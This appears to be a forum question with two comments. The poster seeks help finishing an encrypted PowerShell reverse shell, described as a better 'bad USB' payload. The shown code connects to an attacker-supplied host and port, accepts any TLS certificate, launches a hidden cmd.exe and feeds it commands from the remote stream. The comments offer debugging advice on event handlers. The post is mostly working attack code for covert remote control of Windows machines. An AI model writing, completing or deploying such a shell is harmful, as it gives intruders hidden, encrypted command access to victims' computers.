# Reverse TLS powershell with support for pipelines

Tags: powershell, shell

I know there are bad USB payloads for reverse TCP shell in powershell but they are primitive.
There usually just execute the received command and when process terminates it send back the standard output. When command runs another shell like diskpart netsh wmic ...etc shell freezes because it is waiting for command process to finish because command ran another shell it just stays waiting until process of that shell terminates.
These reverse shell don't support:
Prompts,
Pipelines,
Encryption,
Colored Text,
Hot keys,
...etc

I am trying to create one but there is a problem.

```
$socket = new-object net.sockets.tcpclient($args[0],$args[1])
$tcpstream = $socket.getstream()
$tlsstream = new-object net.security.sslstream($tcpstream,$false,[net.security.remotecertificatevalidationcallback]{$true})
$tlsstream.authenticateasclient('')
$tlsstreamwriter = new-object io.streamwriter($tlsstream)
$tlsstreamwriter.autoflush = $true
$tlsstreamreader = new-object io.streamreader($tlsstream)
$shellinfo = new-object diagnostics.processstartinfo
$shellinfo.filename = 'cmd.exe'
$shellinfo.createnowindow = $true
$shellinfo.useshellexecute = $false
$shellinfo.redirectstandardoutput = $true
$shellinfo.redirectstandardinput = $true
$shell = new-object diagnostics.process
$shell.startinfo = $shellinfo
$shell.start()|out-null
$stdout = $shell.standardoutput
$stdin = $shell.standardinput
$stdout|gm
while($shell.hasexited -eq $false)
{
    # Code that send stdout to tlsstream
    # If I use $tlsstreamwriter.write($stdout.readline()) readline() method send back string of next line if there is no new line in stream it waits for new one, but that will freeze the shell. Is there a way to detect when is new data is written in the TLS stream so if is no new data it will break out of loop just waiting for new command to be received and piped to stdin.
    $stdin.writeline($tlsstreamreader.readline()) #Reads the line from the tlsstream and write it to the line in stdin.
}
```

Comment: I think you'd rather want to add an event handler to `$shell.OutputDataReceived` with `Register-ObjectEvent`

Comment: Do you mean `register-objectevent -inputobject $shell -eventname outputdatareceived -action {write-host datareceived}` if so I doesn't work I tried also `register-objectevent -inputobject $shell -eventname exited -action {write-host exited}` and that work I don't understand why it is not working?